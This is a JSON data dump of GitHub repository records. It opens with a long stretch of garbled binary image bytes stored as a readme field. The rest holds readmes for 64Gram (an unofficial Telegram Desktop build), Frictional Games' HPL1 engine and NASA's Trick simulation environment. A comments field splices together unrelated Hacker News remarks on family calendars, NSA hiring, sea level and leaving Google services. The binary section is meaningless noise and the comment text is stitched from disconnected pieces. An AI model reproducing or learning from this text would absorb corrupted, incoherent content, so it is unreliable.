\u0003Tp\nr\"\ufffd{@\u0006\ufffd\ufffd]\ufffd\n\ufffd\ufffd?\ufffd\u007f\ufffd\ufffd\"\u0012\u001b\ufffd\ufffd{@\u0006\ufffd\ufffd\u0014\ufffdD\ufffd\ufffd\ufffd\fP\ufffd\ufffdb\u0015\ufffd\ufffd\u007f\ufffd\ufffdD\"\ufffdH$|\ufffd-\"q\u001c\u01278N\u0006\ufffd\ufffd\ufffd\ufffd\u0014\ufffdI|u\ufffdO\ufffd\ufffd\ufffdf\ufffd\ufffd\ufffd\u001c\ufffdb\r\ufffde\u0015\ufffd\"\u0017\ufffd)\ufffd\u0010^V\ufffd)r\u0011\ufffdb\r\ufffde\u0015\ufffd\"\u0017\ufffd)\ufffd\u0010^V\ufffd)r\u0011\ufffdb\r\ufffde\u0015\ufffd\"\u0017\ufffd)\ufffd\u0010^V\ufffd)r\u0011\ufffdb\r!e\ufffd\u0017$$E,\ufffdI|\ufffd5\u0004\ufffd\ufffdh\ufffdm\u0010(\ufffd(\ufffd\rA\ufffdRz\ufffd3\ufffd\ufffd\ufffdA\ufffd\ufffd\ufffdl6\u0004=J\u9c6b\u03b0\u0016\ufffd\u0006\ufffdR\ufffd\ufffd\ufffd\u0010\ufffd(\ufffd\u01ee:\ufffdZx[B\ufffd\ufffd\ufffd\u001f\u0019/\ufffd \u0144\ufffd\ufffd\ufffd7\u00002\ufffd`\ufffd\ufffd\u0016SW2\ufffd\u007fd\ufffd\u001c\ufffd\ufffd\ufffd\u0012\ufffd\ufffd?2^\ufffdA\ufffd\tC3\ufffdo\u0000d@\ufffd \ufffd-\ufffd\ufffddL\ufffd\ufffdx9\ufffd\ufffd\ufffd%\ufffd\ufffd\u007fd\ufffd\u001c\ufffd\u0014\u0013\ufffdf\ufffd\ufffd\u0000\u0200\ufffdAJ[L]\u0258\ufffd\ufffd\ufffdrX\u000boK@S\ufffd\ufffd\u0017\ufffd '\ufffdf\ufffd(^\ufffdL{%\ue229\ufffd\u055e\b\ufffd\ufffd\u0002V+\ufffd\ufffd\ufffd\u0014\ufffd2g\u0018\bN\ufffd\ufffda\u0014'g\u0004'\ufffd\ufffd0\ufffd\ufffd:\ufffd0\u0013&g\ufffd\ufffdn\ufffd\ufffd1\ufffdb\ufffd\ufffd0\u0011\u0709\bN\ufffd\ufffda\u0014'g\u0004'\ufffd\ufffd0\ufffd\ufffd3\ufffd\u0015\ufffd\u007f\ufffd\ufffd\ufffd'\ufffd\u001b\br2\ufffd\u2e1dA\u007f)\ufffd\ufffd\u0017\ufffd\u001b\ufffd\ufffd~\ufffd\fD\ufffd\f`\r\ufffd\u0001\ufffd\ufffd<}\ufffd\u00131L\ufffd\u001b\br2\ufffd\ufffd\ufffda\ufffd\ufffd@\ufffd\ufffda\u0014\ufffd\u001ag\ufffd\u0015\ufffd\ufffd\ufffdQ\ufffd\u000b^\ufffd&\ufffdl\ufffd{~\ufffd\n\ufffd5t|\ufffd\ufffd\u0003^\ufffdhTl\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdw\ufffd3\ufffd\ufffd\ufffd4U\ufffd4{|\ufffd\ufffd\ufffd\ufffd\u007f\ufffd'\ufffd\u0017\ufffdk\ufffd\ufffd^\ufffd\nSZ\ufffd\u001b\ufffd\ufffd\ufffdP3l\ufffd\ufffd\ufffd?\ufffdjH\ufffd\ufffdS3\f\u0016\"\ufffd3\ufffd\ufffd\u0004\ufffdc+\ufffd\ufffd\ufffds|\ufffd\ufffd\ufffd\u00147\u0013t\u0006>\u02c2\ufffdg\ufffdO\ufffd\ufffds\ufffdO\ufffdx\ufffd\u0002\u001b\ufffd\ufffd@\ufffd\ufffd\ufffd\ufffd\ufffdq&\ufffd\ufffd\u000b\ufffd[<\ufffdcA\ufffd\ufffd\u0019\ufffd1\ufffdE\u000f\u007f\ufffd\u0007\u0011\ufffd\u0005+?\ufffd\u0006\ufffd\ufffd\u0000Y\ufffdp\ufffd\ufffdy\u0016\ufffd\ufffd<\ufffd\ufffd\ufffdA*\ufffd\ufffd\ufffd-?\u000f\ufffd\ufffd\ufffd#\u26d2\ufffd\u0000\ufffd\"\ufffdD\ufffd\ufffdV\ufffdZ\ufffdO<_\ufffd\ufffd\ufffd\ufffd#\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdYv\ufffdQ\ufffd]q\ufffd\u0090\u0016=s\u0003s\ufffd'\ufffd\ufffd\ufffd\u0650\ufffdA\ufffd1K~\ufffd\r>\ufffdb\u001e\ufffdq\u0006?\u001e\u000beQu\ufffd\ufffd$\ufffd\ufffd\ufffd\u000f\n\ufffd\ufffd\ufffd\u001f\ufffd\u0001\u0011e\ufffd\ufffd1\u05b9a\ufffdki\ufffd\ufffd\ufffde\u0506\u0342\ufffd\\;\u0010\ufffd3\ufffd\u0218\f\ufffd\u0001\ufffd\ufffd7!9\ufffdR\u0000\ufffd\ufffd\ufffdK\u0011l\ufffd9\ufffd\ufffd\ufffd\ufffd\ru\ufffdJ\ufffd\u000e\u001a\n\ufffd\ufffd\"\ufffd\u00194\ufffd\ufffd\u000fpXJ[S\ufffde\ufffd\u04c3b\ufffdP\u0016\ufffd\ufffd2]\ufffd\u000e\ufffd\ua305\ufffd\u0018\ufffdSF\ufffd\ufffd\ufffdA\ufffd\ufffd\u0005\ufffd\u001f\u001c\ufffdG\ufffdm\ufffd\f:(\ufffd\ufffd,\ufffd\r\ufffd\u0143\r\ufffd:\ufffdn\ufffd\f\ufffd5\ufffd3\ufffd\ufffd\u0012\u000bM\u0015K\u0004\u0007|:\ufffd3\ufffdi\ufffd\u0014G\ufffdqC\ufffdY\ufffd\ufffd\u0019p:$\ufffd\ufffd\ufffd\ufffdH\ufffdgp73\ufffd\ufffd\ufffdH\ufffd\f\ufffd&u\ufffd{5\ufffdWK,4U\ufffdG\ufffd^\ufffd&\ufffd0\u0304VgLH\ufffdl\ufffdIr\ufffd\ufffdq_\ufffd\u001a\u0012\ufffd7\u0002&\ufffd\ufffdjB\u0007%\u0016\ufffd\u0005\ufffdS\ufffdq\ufffd;`\u0014\ufffd\u000f1\ufffd\ufffd>\u001e\u0010+\ufffd\u0002\u0420\ufffd\ufffdGRV\ufffd\ufffdz\ufffd\ufffd\f,3\ufffd\ufffd\ufffd\ufffd\\;0\ufffd3h\u0000\ufffds\ufffd\u04e2R\ufffd\ufffd3.\tq\u001f=v\u0011\u0016\ufffd\ufffd^!/\ufffd\ufffdq\ufffd\ufffdG~\ufffd\ufffd}N\u0000\ufffda\ufffdO\u0003\ufffd*o2\ufffd}4 \ufffdx\ufffdU+\ufffdZb\ufffd\ufffdbr\u0006?T/\ufffdU+\r q\ufffd!-\u0010\u0006\ufffdP\ufffd\ufffd\ufffd|t\ufffd\ufffdRX\u030a3x\ufffd\ufffdc\ufffdJ\u0007%\u0016\f\ufffd\ufffd\ufffd\ufffd\ufffdyl`J\ufffd\ufffd\u0019\ufffd\u000fS\ufffd\u0016-~\ufffdU\ufffd\\\ufffdu\ufffd\ufffd\ufffd\u0012\u000bM\u0015\u04d3#\ufffdL\ufffdO\ufffd\ufffd\ufffd\u0002\ufffd%+\ufffd\u0001$\ufffd1\ufffd\ufffd\ufffd[A>TX~3\ufffd\u001c\ufffd\ufffd\ufffd\u0019s\u0656O\ufffd\ufffdp\u0001[VtPb\ufffdTg+\ufffd\u0017\ufffd\u0015]\ufffd.3\ufffdZb\ufffd\ufffdb\ufffd\ufffd4\ufffd\ufffdd\u00054\ufffd\ufffd9M\ufffdz\ufffd\ufffd`\ufffd\ufffd\\\u0632\ufffd\ufffd\u0012\u000b\ufffd\ufffd\f\ufffd\ufffd\ufffd\u0019\ufffdx\r\ufffd\ufffd\f\ufffdc \ufffd\ufffd{5\ufffdB\ufffd\u2339\ufffdr\u0006\ufffdK=\ufffd\u0005&\ufffd9\ufffd~;\ufffdZ\ufffd\ufffd3\n\ufffdk\ufffd\f\ufffd}\u001a\ufffd\ufffd\ufffd\ufffd&\ufffdi]fz\ufffd\ufffd\ufffd0\ufffd\u0003uFW\ufffd\ufffd\ufffd\ufffd!9\ufffdvK\\\ufffd\ufffd\ufffd0\ufffd\ufffd%\ufffd^\ufffd;b\ufffdj\ufffd'\ufffd\ufffd%V+\u0209\ufffd\ufffd0\ufffd\ufffd3V+\u0209\ufffd\ufffd0\ufffd\ufffd3V+\u0209\ufffd\ufffd0\ufffd\ufffd3V+\u0209\ufffd\ufffd0\ufffd\ufffd3\ufffd\ufffd0\ufffdx9\u0006)&\f\u0364\ufffd\u0001\ufffd\u0001\u0005\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd1\ufffd#\ufffd\ufffd\u0016\u0796\ufffd\ufffd\ufffd\ufffd\ufffdr\fRL\u0018\ufffdI\u007f\u0003 \u0003\n\u0006)m1u%c\ufffdG\ufffd\ufffda-\ufffd-!\ufffd\ufffd#\ufffd\ufffd\u0018\ufffd\ufffd04\ufffd\ufffd\u0006@\u0006\u0014\fR\ufffdb\ufffdJ\ufffd\udbfc\udf17\ufffdZ\ufffdFd\u03caaAN\ufffdS\ufffd\ufffd\u01ee:\u0013\ufffd\u0016\"8ANzT\ufffdcW\ufffd\tI\u000b\u0011\ufffd '=*\u000eh&L\ufffd\ufffdN|\ufffdU\u0004\ufffdVp\ufffd\ufffd\u0127XEpi\u0005'\ufffdI|\ufffdU\u0004\ufffdVp\ufffd\ufffd\u0127XEpi\u0005'\ufffdI|\ufffdU\u0004\ufffdVp\ufffd\ufffd\u0127XEpi\u0005'\ufffdI|\ufffdU\ufffd\u0019\ufffd8\b\ufffd\u0013\ufffd$>\u0149D\"\ufffdH\f\ufffd\u0017\ufffd\ufffdq\u0010\ufffd\ufffd8\ufffd\ufffd\ufffd:>\ufffdq\u0012_\ufffd\ufffdS\ufffd!\ufffd\ufffd0\ufffd:\u01e7XCxY\ufffd\ufffd\ufffdE|\ufffd5\ufffd\ufffdU\ufffd\"\ufffd\ufffd\ufffd\u0007d\ufffdv\u0127XCMV\ufffd\u0492\ufffd\ufffd\ufffd(\ufffd\ufffd{@\u0006hG|\ufffd5\ufffdd\ufffd\ufffd\ufffd$>\ufffd\u001aj\ufffd\n\ufffd\u0019t\ufffdg\\\ufffd\\P'\u0012W\bT\ufffd\u0006\u001aH\ufffd*~\ufffdreE\ufffd$\ufffd\u0010h\ufffd\ufffd\u0013\ufffd+\u0004\ufffdX\u0003\r$q\u0015?i\u0673\ufffd\u001d\u0012R\ufffdY\ufffd\u0013\ufffdD\ufffd\n\ufffd*\ufffd@\u0003I\\\ufffdOZ\u05acD\u000bo\ufffd\f]g:*q\r5\ufffd\u0002U\ufffd\ufffd\ufffd+?iY\ufffd\u0012-\ufffd5\u0012h\ufffdk\ufffd\u0005\ufffdXC]W~\u04b2f%Zxk$\ufffd:\ufffd4\u000bT\ufffd\ufffd\ufffd\ufffd\ufffd\ufffde\ufffdJ\ufffd\ufffd\ufffdH\ufffdu\ufffdi\u0016\ufffdb\ru]\ufffdI\u02da\ufffdh\u1b51@\ufffd\\\ufffd,P\ufffd\u001a\ufffd\ufffd5+\ufffd\ufffd[#\ufffd\u05b9\ufffdY\ufffd\ufffd5\ufffdu\ufffd'-kV\ufffd\ufffd\ufffdF\u0002\ufffdsM\ufffd@\u0015k\ufffd\ufffd\ufffdOZ\u05acD\u000bo\ufffd\u0004Z\ufffdf\ufffd*\ufffdP\u05d5\ufffd\ufffd\ufffdY\ufffd\ufffd\ufffd\u0010\ufffdS!\ufffd:\u01e7XC]W~\u04b2f\ufffdN+\ufffd:\u01e7\ufffd\ufffd\ufffd+?iY\ufffdJ\ufffdP\ufffdQqA\ufffdL\ufffd\ufffdAG%nG|\ufffdU\ufffdI\u02daUr\ufffd\u001a\ufffd\ufffdU\ufffdI\u02daUr\ufffd\u001a\ufffd\ufffdU\ufffdI\u02daUr\ufffd\u001a\ufffd\ufffdU\ufffdI\u02daU\u000f\ufffdx*\u001e\ufffd\ufffd\\<\ufffd\ufffd\ufffduY\ufffd\ufffd:7Pl\ufffdn\u00e3b\u0015\u03b4\ufffd\ufffdS\ufffd\ufffdg+\ufffd\u0003\ufffd\ufffdf\u05433&\ufffd\ufffdi\ufffdc\ufffd?\u0001\u04ca\ufffd:7Pl\ufffdn\u00e3b\u0015\ufffd\ufffd\u001e\ufffdG\ufffd>\u0015OB}\ufffd\ufffd\ufffd\ufffd`\u036a\u0007g\ufffd9\u0003\ufffd\ufffd#\u03b4z\ufffd3\ufffd\u0011\ufffd\u0608SP;\ufffd\ufffd\ufffd\ufffd\ufffd\u0127X\ufffd\ufffd\ufffd\ufffdY\ufffd\u0019\ufffd\ufffd\u0749O\ufffd\n?iu\ufffd*\ufffd:\u01e7X\ufffd\ufffd\ufffd:d\u0015_\ufffd\ufffdS\ufffd\ufffdOZ\ufffd\ufffd\ufffdD$\ufffd\u0010h\ufffd\ufffdS\ufffd\u0015?i\ufffd\ufffd\ufffdF\u0012W\b\ufffd\ufffd\u0509\ufffd\u0015\u0002U\ufffd\u0015?i\ufffd\ufffd\ufffdF\u0012W\b\ufffd\ufffd\u0509\ufffd\u0015\u0002U\ufffd\ufffdf&L\ufffdPB\ufffdH\\!P\ufffd\u001ah \ufffd\ufffd\ufffdI\u02d5\u00155\ufffd\ufffdB\ufffdu\ufffdN$\ufffd\u0010\ufffdb\r4\ufffd\ufffdU\ufffd\ufffd\ufffd\u028a\u001aI\\!\ufffd:S'\u0012W\bT\ufffd\u0006\u001aH\ufffd*~\ufffdreE\ufffd$\ufffd\u0000/\ufffd\ufffd\f\u040e\ufffd\u0014k\ufffd\ufffd\ufffd_Z\u04bf\ufffd\u001aE\ufffdr\u000f\ufffd\u0000\ufffdO\ufffd\ufffd\ufffd\ufffd\ufffd3\ufffd\u0127XCMV\ufffd9#P\ufffdS\ufffd!\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u00059\ufffdO\ufffd\ufffd\ufffd\ufffd\u0012-\ufffd\r\u0002\ufffd\u0014e\ufffd!\ufffdQJ\ufffd]u\ufffd\ufffd\ufffd6\b\ufffdR\ufffd\u0346\ufffdG)=v\ufffd\u0019\ufffd\ufffd\ufffd PJQ6\u001b\ufffd\u001e\ufffd\ufffd\ufffdUgX\u000bo\ufffd@)E\ufffdl\bz\ufffd\ufffdcW\ufffda-\ufffd\r\u0002\ufffd\u0014e\ufffd!\ufffdQJ\ufffd]u\ufffd\ufffd\ufffd6\b\ufffdR\ufffd\u0346\ufffdG)=v\ufffd\u0019\ufffd\ufffd\ufffd PJQ6\u001b\ufffd\u001e\ufffd\ufffd\ufffdUgX\u000bo\ufffd@)E\ufffdl\bz\ufffd\ufffdcW\ufffda-\ufffdGd\u03caaAN\ufffdS\ufffd\ufffd\u01ee:\u0013\ufffd\u0016\"8ANzT\ufffdcW\ufffd\tI\u000b\u0011\ufffd '=*\u000eh&L\ufffd\ufffdN|\ufffdU\u0004\ufffdVp\ufffd\ufffd\u0127XEpi\u0005'\ufffdI|\ufffdU\ufffd\ufffd\ufffd\u0013\ufffdX\ufffdr\ufffd\ufffd\ufffd\ufffd\ufffdW9\"\ufffd\ufffd\u0005\ufffd,G\ufffd\ufffd\ufffd\ufffd\u0005\ufffd\ufffd\ufffd0\ufffdXA|\ufffdu\ufffd>/\ufffd#qg=\u0007\ufffd\\~\ufffd\ufffd\u001c\ufffd\t\ufffd\u0019#\u067b@\ufffd\ufffd\ufffd:8:\ufffdp\u000e\ufffd\ufffd]`\ufffd\ufffd8\u2bcf}\ufffd\ufffd\u01df\ufffd\ufffdhX\ufffdq\ufffd\ufffd\n:*\u001e\ufffd\ufffd\ufffd\ufffd\u0005\ufffd*\ufffd\ufffd\"\ufffd\ufffdBO\ufffd\ufffd\u0019\ufffd\u0000\rd\ufffd\u0002\ufffd\ufffd\ufffd\n\ufffds\ufffd/I\ufffd\ufffd\ufffd\ufffd;4hX\ufffd?\ufffd.\ufffd\u0015tT|j\ufffd\ufffd\ufffd_\ufffd:\ufffd\ufffd\ufffd\ufffd\ufffd_>\ufffd\ufffd\ufffd\ufffd\ufffd\u001d4\ufffd\ufffd\u000b\ufffd\ufffdK\ufffd\ufffdu\ufffd88\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd8\u0713\ufffdH`\ufffd\u0018\ufffd\ufffdeOdw\u05e7G{[\u0400^S\ufffd\ufffd3\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u001b\u0011\ufffd|syR\ufffdG8\ufffd\ufffd\ufffdo\ufffd\ufffd\u0018\ufffd\u001c\u001c]\u02b5C O\ufffd\ufffdx\ufffd\ufffdE\ufffd\u0011H<\ufffd8\u000eb\ufffd\ufffd\"\ufffd\ufffd\ufffd\u0010\n\ufffd\ufffdo\u0004\ufffd'N\f\ufffd\u0609\ufffd\u0013\ufffd\ufffd\u0018\ufffdq\u001a\ufffd?@\u0017.\ufffd\u0006=q\ufffdf\ufffdXd\u000b,\ufffd\u43e3U\ufffd\ufffd\u0000t\ufffd;i\ufffd\ufffd'\u0016A\u007f|\ufffd$\ufffd\u0015\ufffd\u0003\ufffd\ufffd\ufffd\u0012\ufffd\ufffd\ufffd\u0013X\ufffd\ufffd\ufffd\ufffd\"\ufffd\ufffd\ufffd?\ufffdV\ufffd-\u0018\ufffd@\ufffd x\ufffd\ufffdX\ufffd\ufffd\ufffd\ufffdo\ufffd\u03e1\ufffd\u0012\ufffd\ufffd\ufffd2\ufffdk)\ufffd0\ufffd?F0\ufffd\u012bb\ufffd\u0013w\u001f^\ufffd'\u00161\ufffd\ufffdd\u0010\u007f\ufffd\ufffdy\ufffdpxF\ufffdpK\ufffdpb\ufffd\ufffd\ufffd\u00ca>\ufffdbOH\ufffd\u0004z\ufffd y\ufffd\ufffd\ufffd\ufffd\u0001+\ufffdA?\ufffd\u0002O\ufffd\ufffd?\ufffd\u0001O\ufffd$Oh\ufffd:8\u001a\ufffd\u001f\ufffd\u03bd\ufffd\ufffd/\ufffd\ufffd\ufffd\u425e\ufffd\ufffd\ufffdx\ufffd\ufffd\u000e\ufffd\ufffd#\ufffd'\u031e\ufffdK\ufffd\ufffdo\u007f\\\ufffd\ufffd]\ufffd@\ufffd(-E\ufffd'\ufffdf\ufffd\ufffd\ufffd~\ufffd\ufffd+\ufffd\ufffd?\ufffdBO\ufffd?\ufffdH\ufffd\ufffd\ufffd\ufffd\u0000\ufffd\ufffdJ\ufffd\ufffd>t\ufffd\ufffd9\ufffd5\ufffdg\ubd1f\ufffd\ufffd<\ufffdB\ufffd\u000bBK\ufffd8h\ufffd\u0011tu8:\ufffd\ufffd|\ufffd\ufffd<\u0011\b\ufffd/\ufffd\ufffd\ufffd\u0007~Q\u0003;j\ufffd\f\ufffd'`.\ufffd|g\ufffd\ufffd\ufffd\ufffdf\ufffdD^\ufffd\ufffdz\ufffdU\ufffd\ufffd'\ufffd\ufffd'\ufffd\ufffd\ufffd\u0005T\ufffd\ufffd\ufffd\u02ff\ufffd\ufffd\ufffd\u0019\u0016O\ufffd\ufffdfJ\ufffdH\u001b\u007f\ufffd\r\ufffd\ufffd]\ufffd\u0018<\ufffd_\ufffdL\ufffd\b\u001d\ufffd?,\u0013\ufffd\ufffdJ\u001b`\ufffd[\ufffd=\ufffd'\u001c\ufffd\ufffd\ufffd\ufffdQ~A\ufffd:\ufffd\ufffd\u007f\ufffd\ufffd\u0651\ufffd\ufffdi\ufffdr\ufffdm\ufffdH\u02ceXq\ufffd\u0003\u000e\ufffd\ufffd\ufffd\u001c\u0012g\ufffd\ufffd}G\ufffd\u0004=\ufffdn_\ufffdN\u463e\ufffd\ufffd\ufffd\ufffd\u07dad\u067f\ufffd/\ufffd\ufffd\ufffd\ufffd\u0007\ufffd\u0002p\t~\ufffd&y\ufffd5\ufffde\ufffd\u0002\ufffd9\u0007\u001f\ufffd\ufffd\ufffdSh4:\ufffd\u001dp(y\u2541\ufffd(\u007f\u0001\ufffd\ufffd\u0007\ufffdw\u000es\ufffd\ufffdW\ufffdu\ufffd\ufffd\u0007~A\ufffdl\ufffd\ufffd\ufffdr\ufffd4O$O\ufffd#rr\ufffd#\ufffd%bA\u039b\u007fd\ufffdD,\ufffdy\udafc\udf17\ufffd\u00058g\ufffd7Cj\ufffd;4\ufffd\ufffdo\ufffd\u007f\ufffd\u001f\ufffd\u03df~\ufffd\ufffd?\ufffdO\ufffd$g\u0107\ufffd\u0019\ufffd~\ufffdX\ufffd\ufffds\u0327\ufffd~\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd9\ufffdt\ufffd\ufffdJrF|$g$\ufffd$g$\ufffd$g$\u0334s\ufffd\ufffdL\ufffd\ufffd\ufffdT\ufffdZ\ufffd3\ufffd#9#a&9#a&9#aF\ub317\u00190\ufffd\ufffd\u0019#r\u0006\ufffdK\ufffdXS\ufffd\u0398\ufffd\u001e\ufffd\ufffd\ufffd\f\ufffdh\u0398\ufffd&\ufffd\u0019\ufffd\ufffd\u0019O\ufffdG\u06223\ufffd\ufffd\u0018\ufffd\f\ufffd\ufffd$g\ufffd+:gL\ufffd:\ufffd\u0398\ufffd`\ufffd\ufffd\ufffd=c\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd.\u0000g<\u031e0\u0002g<\ufffd4\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdP8\ufffdp\u0006_`\ufffd3\u0596\u0006\ufffdx\ufffd\ufffd\ufffd8\u0003\ufffd&\uc307\ufffd6YWT\u03b8\ufffd\ufffd\ufffd\ufffd\u0014W\ufffd\ufffd\u0011X\ufffd\ufffdue\ufffd\ufffd\ufffd\ufffd\u8701+\ufffd\t\ufffd\ufffdx\ufffd\ufffd\ufffd\u000et\ufffd\ufffdM\ufffd\ufffdd]\ufffd9\u0003g\ufffdg\ufffd\ufffd\ufffd\ufffd`\u0002\ufffd\u0015\ufffd\ufffd\ufffd$9#>\ufffd\ufffd\ufffdHrF|$g$\ufffd$g$\ufffd$g$\ufffd$g$\ufffd$g$\ufffd$g$\ufffd$g$\ufffd$g$\ufffd$g$\ufffd\ufffd9\u001b\u0006\u0019/\u0011\u000br\ufffd\ufffd#\ufffd%bA\u039b\u007fd\ufffdD\"\ufffdx\ufffdll\ufffd?\ufffd\u0697R\ufffddIk\u0000\u0000\u0000\u0000IEND\ufffdB`\ufffd", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TDesktop-x64/tdesktop", "link": "https://github.com/TDesktop-x64/tdesktop", "tags": [], "stars": 654, "description": "64Gram (unofficial Telegram Desktop)", "lang": "C++", "repo_lang": "", "readme": "\ufeff# 64Gram \u2013 Base on [Telegram Desktop](https://github.com/telegramdesktop/tdesktop)\n\nThe source code is published under GPLv3 with OpenSSL exception, the license is available [here][license].\n\n[![Preview of 64Gram][preview_image]][preview_image_url]\n\n## Project Goal\n\nProvide Windows 64bit build with some enhancements.\n\n~~Cause official Telegram Desktop do not provide Windows 64bit build, so [Project TDesktop x64](https://github.com/TDesktop-x64) is aimed at provide Windows native x64 build(with few enhancements) to everybody.~~\n\n## Roadmap\n\nNo Roadmap? Yes.\n\n## [Features](features.md)\n\n## Supported systems\n\nWindows 7 and above\n\nLinux 64 bit\n\nmacOS > 10.12 and above\n\nThe latest version is available on the [Release](https://github.com/TDesktop-x64/tdesktop/releases) page.\n\n## Localization\n\nIf you want to translate this project, **Just Do It!**\n\nCreate a Pull Request: [Localization Repo](https://github.com/TDesktop-x64/Localization).\n\n**Here is a project [translation template](https://github.com/TDesktop-x64/Localization/blob/master/en.json).**\n\nYou can find a language ID on Telegram's log.txt\n\nFor example: `[2022.04.23 10:37:45] Current Language pack ID: de, Base ID: `\n\nThen your language translation filename is `de.json` or something like that.\n\n***Note: Ignore base ID(base ID translation - Work in progress)***\n\n## Build instructions\n\n* Windows [(32-bit)][win32] [(64-bit)][win64]\n* [macOS][mac]\n* [GNU/Linux using Docker][linux]\n\n## Links\n\n* [Official Telegram Channel](https://t.me/tg_x64)\n* [Official discussion group](https://t.me/tg_x64_chat)\n\n## Sponsors\n\n \"JetBrains\"\n\n\n[//]: # (LINKS)\n[license]: LICENSE\n[win32]: docs/building-win.md\n[win64]: docs/building-win-x64.md\n[mac]: docs/building-mac.md\n[linux]: docs/building-linux.md\n[preview_image]: https://github.com/TDesktop-x64/tdesktop/blob/dev/docs/assets/preview.png \"Preview of 64Gram Desktop\"\n[preview_image_url]: https://raw.githubusercontent.com/TDesktop-x64/tdesktop/dev/docs/assets/preview.png\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "FrictionalGames/HPL1Engine", "link": "https://github.com/FrictionalGames/HPL1Engine", "tags": [], "stars": 654, "description": "A real time 3D engine.", "lang": "C++", "repo_lang": "", "readme": "HPL1 Engine Source Code\n=======================\n\nYes, here it is at last the Engine that made the Penumbra Series.\n\nRead through the TODO file for various known things that should be cleaned up / fixed.\n\nIncluded are project files for Xcode, Visual Studio 2003 and Cmake (for Linux)\n\nContributing Code\n-----------------\nWe encourage everyone to contribute code to this project, so just sign up for a github account, create a fork and hack away at the codebase. We will start an Open Source forum on the Frictional Games forums as a place to talk about changes and to submit patches from your forks.\n\n\nLicense Information\n-------------------\nAll code is under the GPL Version 3 license except for the \"test\" which are included under the ZLIB license. All of the assets are licensed under the Creative Commons Attribution Share-Alike 3.0 license except for the CG shaders which are under the ZLIB license. Please read the COPYING and LICENSE-* files for more information on terms of use.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nasa/trick", "link": "https://github.com/nasa/trick", "tags": [], "stars": 654, "description": "Trick Simulation Environment. Trick provides a common set of simulation capabilities and utilities to build simulations automatically.", "lang": "C++", "repo_lang": "", "readme": "

\n\n \n \n \"Trick\n\n

\n\n

\n\n\"Linux\"\n\n\n\"macOS\"\n\n\n\"macOS\"\n\n\n\"Coverage\n\n

\n\n\n

\nThe Trick Simulation Environment, developed at the NASA Johnson Space Center, is a powerful simulation development framework that enables users to build applications for all phases of space vehicle development. Trick expedites the creation of simulations for early vehicle design, performance evaluation, flight software development, flight vehicle dynamic load analysis, and virtual/hardware in the loop training. Trick's purpose is to provide a common set of simulation capabilities that allow users to concentrate on their domain specific models, rather than simulation-specific functions like job ordering, input file processing, or data recording.\n

\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
Install GuideTutorialDocumentation
Follow the installation guide to properly configure Trick on your operating system.Complete the tutorial to become familiar with the basics.Visit the documentation for a more complete understanding of Trick.
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
Related ProjectsFrequently Asked QuestionsHow-To Guides
View some of the many projects that use Trick.Read some of the most frequently asked questions pertaining to Trick.See a collection of how-to guides detailing common Trick processes.
\n\n\n \n \n \n \n \n \n \n \n \n \n \n
Developer Docs
Read detailed documentation for various Trick internals and processes.
\n\n---\n\nTrick is released under the NASA Open Source Agreement Version 1.3 [license](https://github.com/nasa/trick/blob/master/LICENSE).\n", "readme_type": "markdown", "hn_comments": "Did you explore what could be the reason behind this?\nIf it\u2019s about data ownership, try going with self-hosted solutions.This sounds like a classic \"it's not a technology problem and technology won't solve it\" situation. Synchronize by traditional human-to-human communication and then you both do your preferred method of self-organization independently. If you want to synchronize schedules asynchronously, a paper calendar on a wall in the house should work for that.If/when you do HASS, make sure that any device that she is affected by (save for the router/hotspot, I guess) can also be controlled and overridden manually with physical buttons without needing her to use a computer or smartphone. If she has any concern about data/privacy which play into this, respect that by self-hosting locally rather than offloading to google calendar et al.>Rob Joyce - NSA Director of Cybersecurity @NSA_CSDirector - Nov 6Former NSA or Intel community? Come on back! We now have a vacancy listing to fast track former employees back in. Check it out.*\n\n\nIs the NSA looking to employ ex Twitter and Facebook employees?Classic. I've been using similar methods for measurements of transmission delays in the research on different human-controlled variables (though, I've found difference equations more intuitive and easier to represent in code than Laplace transforms). It looks like different controlled variables have different transmission delays, where, eg. the spinal loops are very fast, brainstem-spinal longer, and cortico-spinal even longer, as if the nervous system was split into discrete layers.3.4 mm per year over the last thirty years. 1.1 feet per century.Meanwhile, the tide around here goes up and down five feet twice every day.I've always wondered, if all the ice melts, how much further up will the water go, or what is the maximum. iirc, it has gone up around 500 feet since the last ice age started receding, with most of that near the early stages.Wait why is Netflix on your list? How are Netflix and Alphabet/Google related?Glad to see de-googling picking up steam. Personally, I created a Google Keep clone PWA[1] to address what I was missing after cutting the google tumor out of my life. I hope to see more and more passion projects which respect privacy and are of equal utility to what google provides.[1] https://tinylist.appI went with a pretty straightforward approach at the time. I mostly de-Googled myself 3-4 years ago.I use Fastmail for email and calendar, DuckDuckGo & StartPage for searching, Firefox as a web browser, and a Synology NAS for storage over Google Drive.I use Google Drive / Docs / Sheets occasionally for collaborating. Most people aren't de-Googled so it's more of a hassle to ask them to use a different service. Additionally, I don't use Google services for anything particularly important so I don't mind if Google knows about it.Fastmail isn't the most private service out there, but it is an amazing service to use for email, calendar, contacts, file storage, and notes. It works with 1Password with masked emails [0].You can also use sieve [1] to fine tune your filter rules. I'm not aware of other email services that provide this (unless of course you are hosting your own).I've played with it a bit. You don't really need to do it because the interface they have can generate sieve code for you, but it's nice that it is an option.[0]: https://www.fastmail.com/1password/\n[1]: http://sieve.info/> Using Google on your device stores your location every time you turn it on. It stores your search history across all your devices in a separate database, meaning even if you were to delete said history on all your devices, Google would still have a record of it.All of this can easily be disabled on the setting page for your Google account? And, location history is off by default.Yes: https://mallocate.com/blog/removing-google/Some of these make very little sense. For example:\u2022 Google Images\u2014 Unsplash - Pexels - Simple Gallery 